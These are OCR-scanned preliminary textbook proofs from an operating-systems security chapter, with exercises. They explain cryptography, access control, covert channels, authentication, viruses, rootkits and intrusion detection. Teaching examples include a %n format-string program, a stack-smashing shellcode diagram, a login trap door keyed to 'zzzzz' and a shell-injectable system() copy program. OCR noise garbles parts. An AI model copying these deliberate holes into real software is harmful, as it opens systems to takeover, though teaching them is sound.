207. s do not like typing even though they are excellent typists Why name a variable reference_count when rc obviously means the same thing and saves 13 keystrokes on every occurrence This dislike of typing can some times lead to catastrophic system failures as described below Consider the following fragment from a C program that prints the traditional C greeting at the start of a program char s Hello World printf s s In this program the character string variable s is declared and initialized to a string consisting of Hello World and a zero byte to indicated the end of the string The call to the function print has two arguments the format string s which instructs it to print a string and the address of the string When executed this piece of code prints the string on the screen or wherever standard output goes It is correct and bulletproof But suppose the programmer gets lazy and instead of the above types char s Hello World printf s PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any_prohibited reproduction SEC 9 6 storage in a retrieval Syatath OLTENGMIGSOD IG Bly Ein or by any means electronic 53 mechanical photocopying recording or l
208. s guaranteed to delay for a fixed time set by its argument Measure the data rate on an idle system Then create an artificially heavy load by starting up numerous different background processes and measure the data rate again PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication ip protested by Copyright and written permission should be obtained from the publisher prior to ayyyyonbited reproduction CHAP 9 storage in a retrieval system oft is5i Mn any form or by any means electronic mechanical photocopying recording or likewise 53 Several Unix systems use DES algorithm for encrypting passwords These systems typically apply DES 25 times in a row to obtain the encrypted password Download an implementation of DES from the Internet and write a program that encrypts a pass word and checks if a password is valid for such a system Generate a list of 10 encrypted passwords using Morris Thomson protection scheme Use 16 bit salt 54 Suppose a system uses ACLs to maintain its protection matrix Write a set of manage ment functions to manage the ACLs when 1 a new object is created 2 an object is deleted 3 a new domain is created 4 a domain is deleted 5 new access rights a combination of r w x are granted to a domain to access an object 6 existing access rights of a d
209. s may be infected Putting them back without cleaning them may just reinstall the virus PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 4 storage ina ty y means electeniayt 9 mechanical photocopying recording or likewise 43 Yes but the mechanism is slightly different from Windows In UNIX a companion virus can be installed in a directory on the search path ahead of the one in which the real program lives The most common example is to insert a program ls in a user directory which effectively overrides bin s because it is found first 44 A worm is a freestanding program that works by itself A virus is a code fragment that attaches to another program The worm reproduces by making more copies of the worm program The virus reproduces by infecting other programs 45 Obviously executing any program from an unknown source is dangerous Self extracting archives can be especially dangerous because they can release multiple files into multiple directories and the extraction program itself could be a Trojan horse If a choice is available it is much better to obtain files in the form of an ordinary archive which you can then extract with tools you trust
210. s no longer authorized to access the file at all 9 3 3 Capabilities The other way of slicing up the matrix of Fig 9 6 is by rows When this method is used associated with each process is a list of objects that may be accessed along with an indication of which operations are permitted on each in other words its domain This list is called a capability list or C list and the indi vidual items on it are called capabilities Dennis and Van Horn 1966 Fabry PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 18 storage in a retrieval system or 4HAsMREiGY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise 1974 A set of three processes and their capability lists is shown in Fig 9 9 User space JN Kernel space Figure 9 9 When capabilities are used each process has a capability list Each capability grants the owner certain rights on a certain object In Fig 9 9 the process owned by user A can read files FZ and F2 for example Usually a capability consists of a file or more generally an object identifier and a bitmap for the various rights In a UNIX like system the file identifier wou
211. s this graph tell us For one thing the first system call the program makes under all conditions is open The next one is either read or write depend ing on which branch of the if statement is taken If the second call is write it means the file could not be opened and the next call must be exit If the second call is read there may be an arbitrarily large number of additional calls to read and eventually calls to close write and exit In the absence of an intruder no other sequences are possible If the program is jailed the jailer will see all the system calls and can easily verify that the sequence is valid Now suppose someone finds a bug in this program and manages to trigger a buffer overflow and inserts and executes hostile code When the hostile code runs it will most likely execute a different sequence of system calls For example it might try to open some file it wants to copy or it might open a network connection to phone home On the very first system call that does not fit the pattern the jailer knows definitively that there has been an attack and can take action such as kil ling the process and alerting the system administrator In this manner intrusion detection systems can detect attacks while they are going on Static analysis of system calls is just one of the many ways an IDS can work When this kind of static model based intrusion detection is used the jailer has to know the model i e the system call graph The mos
212. should always be public Trying to keep them secret almost never works and gives the people trying to keep the secrets a false sense of security In the trade this tactic is called security by obscurity and is employed only by security amateurs Oddly enough this category also includes many huge multinational corporations that really should know better Instead the secrecy depends on parameters to the algorithms called keys If P is the plaintext file Kg is the encryption key C is the ciphertext and E is the encryption algorithm i e function then C E P Kg This is the definition of encryption It says that the ciphertext is obtained by using the known encryption algorithm E with the plaintext P and the secret encryption key Kg as param eters The idea that the algorithms should all be public and the secrecy should reside exclusively in the keys is called Kerckhoffs Principle formulated by the 19th century Dutch cryptographer Auguste Kerchkoffs All serious cryptographers subscribe to this idea now Similarly P D C Kp where D is the decryption algorithm and Kp is the decryption key This says that to get the plaintext P back from the ciphertext C and the decryption key Kp one runs the algorithm D with C and Kp as parame ters The relation between the various pieces is shown in Fig 9 2 Encryption key Ke4 K pe Decryption key C E P K P D C Kp P E P Ciphertext Plaintext in z P
213. should be obtained from the publisher prior to any prohibited reproduction 80 storage in a retrieval system or HASMREiBY in any form or by any means elec amp rddi amp P 9 mechanical photocopying recording or likewise Rootkit Detection Rootkits are hard to detect when the hardware operating system libraries and applications cannot be trusted For example an obvious way to look for a rootkit is to make listings of all the files on the disk However the system call that reads a directory the library procedure that calls this system call and the program that does the listing are all potentially malicious and might censor the results omitting any files relating to the rootkit Nevertheless the situation is not hope less as described below Detecting a rootkit that boots its own hypervisor and then runs the operating system and all applications in a virtual machine under its control is tricky but not impossible It requires carefully looking for minor discrepancies in performance and functionality between a virtual machine and a real one Garfinkel et al 2007 have suggested several of them as described below Carpenter et al 2007 also discuss this subject One whole class of detection methods relies on the fact that hypervisor itself uses physical resources and the loss of these resources can be detected For exam ple the hypervisor itself needs to use some TLB entries competing with the vir tual machine for these scarce res
214. stem calls It can easily detect that the antivirus program is reading the boot sector to check for viruses To thwart the antivirus program the virus does not make the system call Instead it just returns the true boot sector from its hiding place in the bad block list It also makes a mental note to reinfect all the files when the virus scanner is finished To prevent being spoofed by a virus the antivirus program could make hard reads to the disk bypassing the operating system However this requires having built in device drivers for IDE SCSI and other common disks making the antivirus program less portable and subject to failure on computers with unusual disks Furthermore since bypassing the operating system to read the boot sector is possible but bypassing it to read all the executable files is not there is also some danger that the virus can produce fraudulent data about executable files as well Integrity Checkers A completely different approach to virus detection is integrity checking An antivirus program that works this way first scans the hard disk for viruses Once it is convinced that the disk is clean it computes a checksum for each executable file The checksum algorithm could be something as simple as treating all the words in the program text as 32 or 64 bit integers and adding them up but it also be a cryptographic hash that is nearly impossible to invert It then writes the list of checksums for all the relevant files
215. swer pairs would be needed Another variation is challenge response When this is used the user picks an algorithm when signing up as a user for example x When the user logs in the server sends the user an argument say 7 in which case the user types 49 The algorithm can be different in the morning and afternoon on different days of the week and so on If the user s device has real computing power such as a personal computer a personal digital assistant or a cell phone a more powerful form of challenge response can be used In advance the user selects a secret key k which is ini tially brought to the server system by hand A copy is also kept securely on the user s computer At login time the server sends a random number r to the user s computer which then computes f r k and sends that back where f is a publicly known function The server then does the computation itself and checks if the result sent back agrees with the computation The advantage of this scheme over a password is that even if a wiretapper sees and records all the traffic in both direc tions he will learn nothing that helps him next time Of course the function f PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publis
216. systems it may be possible for a process to detect the status of a lock even on a file that it cannot access This covert channel is illustrated in Fig 9 15 with the file locked or unlocked for some fixed time interval known to both the server and collaborator In this example the secret bit stream 11010100 is being transmitted ii i j i T i i 0 o o lt Bit stream sent file to send 1 p e S T S ne Time gt Server unlocks file to send 0 1 Figure 9 15 A covert channel using file locking PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This aaa is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 9 3 storage in a retrievaPs Gdn GAANA iha hor by any means electronic mechanical photocopying recording or likewise Locking and unlocking a prearranged file S is not an especially noisy chan nel but it does require fairly accurate timing unless the bit rate is very low The reliability and performance can be increased even more using an acknowledge ment protocol This protocol uses two more files F and F2 locked by the server and collaborator respectively to keep the two processes synchronized After the server locks or unlocks S it flips the lock status of FZ to indicate that a bit ha
217. t al 2005 Intrusion detec tion systems are an especially hot topic with work going on about both real time and historical intrusions King and Chen 2005 2006 Saidi 2007 Wang et al 2006b and Wheeler and Fulp 2007 Honeypots are naturally an important aspect of IDSes and get quite a bit of attention themselves Anagnostakis et al 2005 Asrigo et al 2006 Portokalidis et al 2006 9 10 SUMMARY Computers frequently contain valuable and confidential data including tax returns credit card numbers business plans trade secrets and much more The owners of these computers are usually quite keen on having them remain private and not tampered with which rapidly leads to the requirement that operating sys tems must provide good security One way to keep information secret is to encrypt it and manage the keys carefully Sometimes it is necessary to prove the authenti city of digital information in which case cryptographic hashes digital signatures and certificates signed by a trusted certification authority can be used Access rights to information can be modeled as a big matrix with the rows being the domains users and the columns being the objects e g files Each cell specifies the access rights of the domain to the object Since the matrix is sparse it can be stored by row which becomes a capability list saying what that domain can do or by column in which case it becomes an access control list tel ling who can access
218. t anything Instead it calculates how many characters should have been output already at the place it appears in the string and stores it into the next argu ment to printf to be processed Here is an example of a program using n int main int argc char argv int i 0 printf Hello nworld n amp i the n stores into i printf i Y d n i i is now 6 When this program is compiled and run the output is Hello world i 6 Note that the variable i has been modified by a call to printf something not obvi ous to everyone While this feature is useful once in a blue moon it means that printing a format string can cause a word or many words to be stored into memory Was it a good idea to include this feature in print Definitely not but it seemed so handy at the time A lot of software vulnerabilities started like this As we saw in the preceding example by accident the programmer who modi fied the code allowed the user of the program to inadvertently enter a format string Since printing a format string can overwrite memory we now have the PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 54 storage in a retrieval system
219. t dogs have to do with haute cuisine In this section we will give a birds eye view of cryptography in the computer era some of which will be useful for understanding the rest of this chapter Besides anyone at all concerned with security should at least know the basics However a serious discussion of cryptography is beyond the scope of this book Many excellent PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 2 storage in a retrievaBASEMS Oran OS Rs PUY or by any means electronic 7 mechanical photocopying recording or likewise books on computer security discuss the topic at length The interested reader is referred to these e g Kaufman et al 2002 and Pfleeger and Pfleeger 2006 Below we give a very quick discussion of cryptography for readers not familiar with it at all The purpose of cryptography is to take a message or file called the plaintext and encrypt it into the ciphertext in such a way that only authorized people know how to convert it back to the plaintext For all others the ciphertext is just an incomprehensible pile of bits Strange as it may sound to beginners in the area the encryption and decryption algorithms functions
220. t release of the data to unauthorized people does not occur As a bare minimum the owner should be able to specify who can see what and the system should enforce these PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 4 storage in a retrieval system or HAsMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise specifications Goal Threat Data confidentiality Exposure of data Data integrity Tampering with data System availability Denial of service Exclusion of outsiders System takeover by viruses Figure 9 1 Security goals and threats The second goal data integrity means that unauthorized users should not be able to modify any data without the owner s permission Data modification in this context includes not only changing the data but also removing data and adding false data as well If a system cannot guarantee that data deposited in it remain unchanged until the owner decides to change them it is not worth much as an information system The third goal system availability means that nobody can disturb the system to make it unusable Such denial of service attacks are increas
221. t straightforward way for it to learn it is to have the compiler generate it and have the author of the program PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 8 storage in a retrieval system or lbEYSHINSSEDSin any form or by any means electronic 95 mechanical photocopying recording or likewise int main int argc char argv int fd n 0 char buf 1 fd open data 0 if fd lt 0 printf Bad data file n exit 1 else while 1 read fd buf 1 if buf 0 0 close fd printf n d n n exit 0 n n 1 a b Figure 9 36 a A program b System call graph for a sign it and attach its certificate In this way any attempt to modify the executable program in advance will be detected when it is run because the actual behavior will not agree with the signed expected behavior Unfortunately it is possible for a clever attacker to launch what is called a mimicry attack in which the inserted code makes the same system calls as the program is supposed to Wagner and Soto 2002 so more sophisticated models are needed than just tracking system calls Still as part of defense in depth an IDS
222. tem flaws that can be attacked and how to fix them Of necessity it circulates this information widely to thousands of system administrators on the Internet Unfortunately the bad guys possibly posing as system administrators may also be able to get bug reports and exploit the loo pholes in the hours or even days before they are closed A variety of other worms have been released since the Morris worm They operate along the same lines as the Morris worm only exploiting different bugs in other software They tend to spread much faster than viruses because they move on their own As a consequence antiworm technology is being developed is being developed to catch the worms on the fly when they first appear rather than waiting for the worm to be catalogged and entered into a central data base Por tokalidis and Bos 2007 PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any_prohibited reproduction SEC 9 7 storage in a retrieval system orla nbrWSAIBdn any form or by any means electronic a5 mechanical photocopying recording or likewise 9 7 4 Spyware An increasingly common kind of malware is spyware Roughly speaking spyware is software that is surrepitiously loaded onto a PC witho
223. tentable ideas technology circuit designs business plans and so forth Often this attempt will involve wiretap ping or even erecting antennas directed at the computer to pick up its electromagnetic radiation It should be clear that trying to keep a hostile foreign government from stealing military secrets is quite a different matter from trying to keep students from PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 6 storage in a retrieval system or HAsMMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise inserting a funny message of the day into the system The amount of effort needed for security and protection clearly depends on who the enemy is thought to be Another category of security pest that has manifested itself in recent years is the virus which will be discussed at length later in this chapter Basically a virus is a piece of code that replicates itself and usually does some damage In a sense the writer of a virus is also an intruder often with high technical skills The difference between a conventional intruder and a virus is that the former refers to a person who is personally trying to br
224. ter will point to a bogus return address that strcpy will itself use when it is done This address is the place the shell code will be located The two words above that are the source and destination addresses for the copy When strcpy is finished the shellcode will PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any_prohibited reproduction SEC 9 6 storage in a retrieval Syatath OLTENGMIGSOD IG Bly An or by any means electronic 55 mechanical photocopying recording or likewise Virtual address space Virtual address space Main s local Partially trashed variables variables src dst Return address for strcpy Return address to main Address of strcpy F s local F s local variables variables SP SP gt Shellcode Program Program a b Figure 9 25 a The stack before the attack b The stack after the stack has been overwritten be at its new home in the executable data segment and strcpy will return to it The shellcode running with the powers the attacked program has can create a shell for the attacker to use later or it start up a script to monitor some IP port and wait for incoming commands At that p
225. that can be dealt with by making infected programs act strangely A user who runs such a program will likely ask the system adminis trator for help The administrator will then try out the strange program himself to see what is going on If the administrator does this while logged in as superuser the virus can now infect the system binaries device drivers operating system and boot sectors All it takes is one mistake like this and all the machines on the LAN are compromised Often machines on a LAN have authorization to log onto remote machines over the Internet or a private corporate or even authorization to execute com mands remotely without logging in This ability provides more opportunity for viruses to spread Thus one innocent mistake can infect the entire company To prevent this scenario all companies should have a general policy telling adminis trators never to make mistakes Another way to spread a virus is to post an infected program to a USENET newsgroup or Website to which programs are regularly posted Also possible is to create a Web page that requires a special browser plug in to view and then make sure the plug ins are infected A different attack is to infect a document and then e mail it to many people or broadcast it to a mailing list or USENET newsgroup usually as an attachment Even people who would never dream of running a program some stranger sent them might not realize that clicking on the attachment to open it can
226. the matrix determines what a process in any domain can do not what it is authorized to do The matrix is what is enforced by the system authorization has to do with management policy As an example of this distinc tion let us consider the simple system of Fig 9 12 in which domains correspond to users In Fig 9 12 a we see the intended protection policy Henry can read and write mailbox7 Robert can read and write secret and all three users can read and execute compiler Objects Objects Compiler Mailbox 7 Secret Compiler Mailbox 7 Secret Read Read E E Read Read Henry Read Read Execute Write Execute Write Read Read Read Read R a b Figure 9 12 a An authorized state b An unauthorized state Henry Robert Now imagine that Robert is very clever and has found a way to issue com mands to have the matrix changed to Fig 9 12 b He has now gained access to PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 24 storage in a retrieval system or HASMIRSIBY in any form or by any means elecfrdiAP 9 mechanical photocopying recording or likewise mailbox7 something he is not authorized to have If he tries to read it the oper
227. the object and how Using formal modeling techniques infor mation flow in a system can be modeled and limited However sometimes it can still leak out using covert channels such as modulating CPU usage In any secure system users must be authenticated This can be done by some thing the user knows something the user has or something the user is bio metrics Two factor identification such as an iris scan and a password can be used to enhance security Insiders such as company employees can defeat system security in a variety of ways These include logic bombs set to go off on some future date trap doors to allow the insider unauthorized access later and login spoofing Many kinds of bugs in the code can be exploited to take over programs and systems These include buffer overflows format string attacks return to libc attacks integer overflow attacks code injection attacks and privilege escalation attacks PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 10 storage in a retrieval system or 4H stMRSibY in any form or by any means elecfcdidP 9 mechanical photocopying recording or likewise The Internet is full of malware including Trojan horses
228. ther this way Suppose that someone comes up with a tiny device capable of doing an instant urinalysis thereby providing a foolproof identification Each computer could be equipped with one of these devices along with a discreet sign reading For login please deposit sample here This might be an absolutely unbreakable system but it would probably have a fairly serious user acceptance problem The same could be said of a system consisting of a thumbtack and a small spectrograph The user would be requested to press his thumb against the thumbtack thus extracting a drop of blood for spectrographic analysis The point is that any authentication scheme must be psychologically acceptable to the user community Finger length measurements probably will not cause any problem but even something as nonintrusive as storing fingerprints on line may be unac ceptable to many people because they associate fingerprints with criminals 9 5 INSIDER ATTACKS We have just seen in some detail how user authentication works Unfor tunately keeping unwanted visitors from logging in is just one of the many secu rity problems that exist A whole different category are what might be termed inside jobs These are executed by programmers and other employees of the company running the computer to be protected or making critical software These attacks differ from external attacks because the insiders have specialized know ledge and access that outsiders do n
229. ther users are likely to have a different search path When the user types prog to the shell the shell first checks to see if there is a program named usr ast bin prog If there is it is executed If it is not there the shell tries usrNocal bin prog usr bin prog bin prog and so on trying all 10 directories in turn before giving up Suppose that just one of these directories was left unpro tected so a cracker could put a program there If this is the first occurrence of the program in the list it will be executed and the Trojan horse will run Most common programs are in bin or usr bin so putting a Trojan horse in usr bin X 1 1 ls does not work for a common program because the real one will be found first However suppose the cracker inserts la into usr bin X11 If a user mistypes la instead of Is the directory listing program now the Trojan horse will run do its dirty work and then issue the correct message that la does not exist By inserting Trojan horses into complicated directories that hardly anyone ever looks at and giving them names that could represent common typing errors there is a fair chance that someone will invoke one of them sooner or later And that someone might be the superuser even superusers make typing errors in which case the Trojan horse now has the opportunity to replace bin Is with a version PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prenti
230. three items change the browser s behavior usually in such a way that even rebooting the system does not restore the previous values This attack is PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 718 storage in a retrieval system or 4HASMREiBY in any form or by any means elecfrddidP 9 mechanical photocopying recording or likewise known as browser hijacking The two items change settings in the Windows registry diverting the unsuspecting user to a different media player that displays the ads the spyware wants displayed and a different search engine that returns Websites the spyware wants it to Adding icons to the desktop is an obvious attempt to get the user to run newly installed software Replacing banner ads 468 x 60 gif images on subsequent Web pages makes it look like all Web pages visited are advertising the sites the spyware chooses But it is the last item that is the most annoying a pop up ad that can be closed but which generates another pop up ad immediately ad infinitem with no way to stop them Additionally spyware sometimes disables the firewall removes competing spyware and carries out other malicious actions Many spyware programs c
231. tters and digits only and that passwords must be a minimum of five characters and a maximum of eight characters how much safer is not displaying anything 24 After getting your degree you apply for a job as director of a large university com puter center that has just put its ancient mainframe system out to pasture and switched over to a large LAN server running UNIX You get the job Fifteen minutes after start ing work your assistant bursts into your office screaming Some students have discovered the algorithm we use for encrypting passwords and posted it on the Inter net What should you do 25 The Morris Thompson protection scheme with the n bit random numbers salt was designed to make it difficult for an intruder to discover a large number of passwords by encrypting common strings in advance Does the scheme also offer protection against a student user who is trying to guess the superuser password on his machine Assume the password file is available for reading PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protested by Copyright and written permission should be obtained from the publisher prior to agyypyonibited reproduction CHAP 9 storage in a retrieval system ot aQuRieVESin any form or by any means electronic mechanical photocopying recording or l
232. turing the system call trap vector This PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 70 storage in a retrieval system or HAsMMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise means that increasingly less skilled people can now write viruses lowering the general quality of the product and giving virus writers a bad name Source Code Viruses Parasitic and boot sector viruses are highly platform specific document vi ruses are somewhat less so Word runs on Windows and the Macintosh but not on UNIX The most portable viruses of all are source code viruses Imagine the virus of Fig 9 27 but with the modification that instead of looking for binary exe cutable files it looks for C programs a change of only 1 line the call to access The infect procedure should be changed to insert the line include lt virus h gt at the top of each C source program One other insertion is needed the line run_virus to activate the virus Deciding where to put this line requires some ability to parse C code since it must be at a place that syntactically allows procedure calls and also not at a place where the
233. ublished by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 48 storage in a retrieval system or HAsMREiBY in any form or by any means elec amp rddi amp P 9 mechanical photocopying recording or likewise while TRUE while TRUE printf login printf login get_string name get_string name disable_echoing disable_echoing printf password printf password get_string password get_string password enable_echoing enable_echoing v check_validity name password v check_validity name password if v break if v stremp name zzzzz 0 break execute_shell name execute_shell name a b Figure 9 22 a Normal code b Code with a trap door inserted 9 5 3 Login Spoofing In this insider attack the perpetrator is a legitimate user who is attempting to collect other people s passwords through a technique called login spoofing It is typically employed in organizations with many public computers on a LAN used by multiple users Many universities for example have rooms full of computers where any student can log onto any computer It works like this Normally when no one is logged in on a UNIX computer a screen similar to that of Fig 9 23 a is displayed When a user sits d
234. ubtle communication channels may be available For example the server can try to communicate a binary bit stream as follows To send a 1 bit it computes as hard as it can for a fixed interval of time To send a 0 bit it goes to sleep for the same length of time The collaborator can try to detect the bit stream by carefully monitoring its response time In general it will get better response when the server is sending a 0 than when the server is sending a 1 This communication channel is known as a covert channel and is illustrated in Fig 9 14 b Of course the covert channel is a noisy channel containing a lot of extrane ous information but information can be reliably sent over a noisy channel by using an error correcting code e g a Hamming code or even something more sophisticated The use of an error correcting code reduces the already low bandwidth of the covert channel even more but it still may be enough to leak sub stantial information It is fairly obvious that no protection model based on a matrix of objects and domains is going to prevent this kind of leakage Modulating the CPU usage is not the only covert channel The paging rate can also be modulated many page faults for a 1 no page faults for a 0 In fact almost any way of degrading system performance in a clocked way is a candidate If the system provides a way of locking files then the server can lock some file to indicate a 1 and unlock it to indicate a 0 On some
235. uld be obtained from the publisher prior to any prohibited reproduction 56 storage in a retrieval system or HAsMREiBY in any form or by any means elec amp rddi amp P 9 mechanical photocopying recording or likewise to be converted If the target width and height are chosen to force an overflow the program will incorrectly calculate how much memory it needs to store the image and call malloc to allocate a much too small buffer for it The situation is now ripe for a buffer overflow attack Similar exploits are possible when the sum or product of signed positive integers results in a negative integer 9 6 5 Code Injection Attacks Yet another exploit involves getting the target program to execute code without realizing it is doing so Consider a program that at some point needs to duplicate some user supplied file under a different name perhaps as a backup If the programmer is too lazy to write the code he could use the system function which forks off a shell and executes its argument as a shell command For exam ple the C code system Is_ gt file list forks off a shell that executes the command Is gt file list listing all the files in the current directory and writing them to a file called file list The code that the lazy programmer might use to duplicate the file is given in Fig 9 26 int main int argc char argv char src 100 dst 100 cmd 205 cp declare 3 strings printf Please enter name of sou
236. user mode boun dary and separate login passwords for each user and the system administrator Under these conditions a virus that somehow sneaks in cannot infect the system binaries Second install only shrink wrapped software bought from a reliable manufac turer Even this is no guarantee since there have been cases where disgruntled employees have slipped viruses onto a commercial software product but it helps a lot Downloading software from Web sites and bulletin boards is risky behavior Third buy a good antivirus software package and use it as directed Be sure to get regular updates from the manufacturer s Web site Fourth do not click on attachments to e mail and tell people not to send them to you Email sent as plain ASCII text is always safe but attachments can start viruses when opened Fifth make frequent backups of key files onto an external medium such as floppy disk CD recordable or tape Keep several generations of each file on a series of backup media That way if you discover a virus you may have a chance to restore files as they were before they were infected Restoring yesterday s infected file does not help but restoring last week s version might Finally sixth resist the temptation to download and run glitzy new free software from an unknown source Maybe there is a reason it is free the maker wants your computer to join his zombie army If you have virtual machine software running unknown software insi
237. users pick better quality passwords rest assured that they do not A 1997 survey of passwords used in the financial district of London revealed that 82 could be guessed easily Commonly used passwords were sexual terms abusive expressions people s names often a family member or a sports star vacation destinations and common objects found around the office Kabay 1997 Thus a cracker can compile a list of potential login names and a list of potential passwords without much work The growth of the Web has made the problem much worse Instead of having only one password many people now have a dozen or more Since remembering them all is too hard they tend to choose simple weak passwords and reuse them on many Websites Florencio and Herley 2007 and Gaw and Felten 2006 Does it really matter if passwords are easy to guess Yes In 1998 the San Jose Mercury News reported that a Berkeley resident Peter Shipley had set up several unused computers as war dialers which dialed all 10 000 telephone numbers belonging to an exchange e g 415 770 xxxx usually in random order to thwart telephone companies that frown upon such usage and try to detect it After making 2 6 million calls he located 20 000 computers in the Bay Area 200 of which had no security at all He estimated that a determined cracker could break into about 75 of the other ones Denning 1999 And this was back in the Jurassic Period where the computer actually had to d
238. ut the owner s knowledge and runs in the background doing things behind the owner s back Defining it though is surprisingly tricky For example Windows Update automatically downloads security patches to Windows machines without the own ers being aware of it Likewise many antivirus program automatically update themselves in the background Neither of these are considered spyware If Potter Stewart were alive he would probably say I can t define spyware but I know it when I see it f Others have tried harder to define it spyware not pornography Barwinski et al 2006 have said it has four characteristics First it hides so the victim can not find it easily Second it collects data about the user Websites visited pass words even credit card numbers Third it communicates the collected informa tion back to its distant master And fourth it tries to survive determined attempts to remove it Additionally some spyware changes settings and performs other malicious and annoying activities as described below Barwinsky et al divided the spyware into three broad categories The first is marketing the spyware simply collects information and sends it back to the mas ter usually to better target advertising to specific machines The second category is surveillance where companies intentionally put spyware on employee machines to keep track of what they are doing and which Websites they are visit ing The third one gets c
239. uthors could not think of a good name for it and used as a temporary placeholder until they could devise a better name They never did and the report was printed with the In this model processes read and write objects but do not communicate with each other directly The Bell La Padula model is illustrated graphically in Fig 9 13 Security level Legend Process Object Faral Figure 9 13 The Bell La Padula multilevel security model PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 26 storage in a retrieval system or 4HASMREIGY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise In this figure a solid arrow from an object to a process indicates that the pro cess is reading the object that is information is flowing from the object to the process Similarly a dashed arrow from a process to an object indicates that the process is writing into the object that is information is flowing from the process to the object Thus all information flows in the direction of the arrows For exam ple process B can read from object but not from object 3 The simple security property says that all solid read
240. ver New Jersey All rights reserved This publication protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction storage in a retrieval system or iby in any form or by any means electrenidy 9 mechanical photocopying recording or likewise 41 Name one disadvantage of a polymorphic encrypting virus from the point of view of the virus writer 42 Often one sees the following instructions for recovering from a virus attack 1 Boot the infected system 2 Back up all files to an external medium 3 Run fdisk to format the disk 4 Reinstall the operating system from the original CD ROM 5 Reload the files from the external medium Name two serious errors in these instructions 43 Are companion viruses viruses that do not modify any existing files possible in UNIX If so how If not why not 44 What is the difference between a virus and a worm How do they each reproduce 45 Self extracting archives which contain one or more compressed files packaged with an extraction program are frequently used to deliver programs or program updates Discuss the security implications of this technique 46 Discuss the possibility of writing a program that takes another program as input and determines if that program contains a virus 47 Section 9 8 1 describes a set of firewall rules to limit outside access to only three ser vices Describe another set of rules that you
